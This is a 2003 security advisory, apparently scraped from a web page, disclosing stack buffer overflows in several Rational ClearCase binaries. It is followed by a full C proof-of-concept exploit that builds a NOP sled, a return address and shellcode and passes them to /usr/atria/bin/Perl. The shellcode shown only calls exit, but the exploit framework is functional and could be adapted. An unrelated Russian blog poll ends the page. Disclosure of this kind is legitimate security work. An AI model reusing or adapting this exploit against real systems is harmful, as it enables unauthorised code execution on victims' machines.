3

*********************************************************************

$ An open security advisory #3 - Rational ClearCase Binary POC Code

*******************************************************************

1: Bug Researcher: c0ntex@hushmail.com

2: Bug Released: September 2003

3: Bug Impact Rate: Low / Medium

4: Bug Scope Rate: Local / Remote

*******************************************************************

*******************************************************************

The definition of Rational in the dictionary:

Definition: [adj] having its source in or being guided by the intellect (distinguished from

experience or emotion); "a rational analysis" [adj] of or associated with or requiring the use

of the mind; "intellectual problems"; "the triumph of the rational over the animal side of man"

There are so far, 10 seperate binaries, including the below that are vulnerable to some form of

stack based attack. All architectures are vulnerable in some form too. It is also possible to

own remote machines from the ClearCase binaries.

[-] Vuln Binary [-] Vuln Architectures [-]Execute Code?

/usr/atria/bin/Perl Intel, Alpha, RISC, Possible SPARC Yes

/usr/atria/bin/notify Intel, Alpha, RISC, Possible SPARC Yes

/usr/atria/bin/cleartool Intel, Alpha, RISC, Possible SPARC Yes

/usr/atria/etc/scrubber Intel, Alpha, RISC, Possible SPARC Yes

/usr/atria/etc/mount_mvfs Intel, Alpha, RISC, Possible SPARC Yes

/usr/atria/etc/imsglog Intel, Alpha, RISC, Possible SPARC Yes

/usr/atria/etc/Gzip Intel, Alpha, RISC, Possible SPARC Yes

None are set SETUID which made people think this was not a threat :D What can I say.

********************************************************************

$ Rational informed 4 weeks ago, no feedback since.

$ Work around: Remove software until a patch has been released.

********************************************************************

*/

#include

#include

#include

#include

#define VER "ClearCase Smack_Crack_And_Hack_Attack Version 1.0.1"

#define NULL (void *)0

#define NOP 0x90

#define RET 0xbfffd838

#define Bucket 1300

char l33t_haXor_c0d3[] = "\x31\xc0\xfe\xc0\xcd\x80";

/*

8048091: 31 c0 xor %eax,%eax

8048093: fe c0 inc %al

8048095: cd 80 int $0x80

*/

int main(int argc, char *argv[]) {

char clearcrush[Bucket];

unsigned long int badd_add;

unsigned short int delta = 0;

unsigned short int i, safety;

while((safety = geteuid()) == 0) {

fprintf(stderr, "My shellcode could be trojan c0d3z, tsk *lol* \n");

_exit(1);

}

if(argc > 1) {

delta = atol(argv[1]);

}

printf("\n\n*************************************************************\n"

"*************************************************************\n");

printf("[-] %s\n", VER);

printf("[-] Bug discovered and PoC developed by c0ntex@hushmail.com.\n"

"[-] --------------------------------------------------------\n"

"[-] with a little bit of copy & paste skill.\n"

"[-] --------------------------------------------------------\n"

"[-] Values from around -2000 -> +2000 should work quite well.\n"

"[-] Or add a request to get current esp value and use that.\n"

"[-] --------------------------------------------------------\n"

"[-] Usage: %s delta_value\n", argv[0]);

badd_add = RET + delta;

for(i = 0; i < Bucket; i += 4)

*(long *) &clearcrush[i] = badd_add;

for(i = 0; i < (Bucket - strlen(l33t_haXor_c0d3) - 100); ++i)

*(clearcrush + i) = NOP;

memcpy(clearcrush + i, l33t_haXor_c0d3, strlen(l33t_haXor_c0d3));

printf("[-] Using Return address 0x%lx\n", badd_add);

printf("[-] Using delta value %d\n", delta);

printf("*************************************************************\n"

"*************************************************************\n\n");

execlp("/usr/atria/bin/Perl", "Perl", clearcrush, NULL);

return 0;

}


Ведете ли вы блог?

Да
Нет
Планирую


Результаты опроса

Новостной блок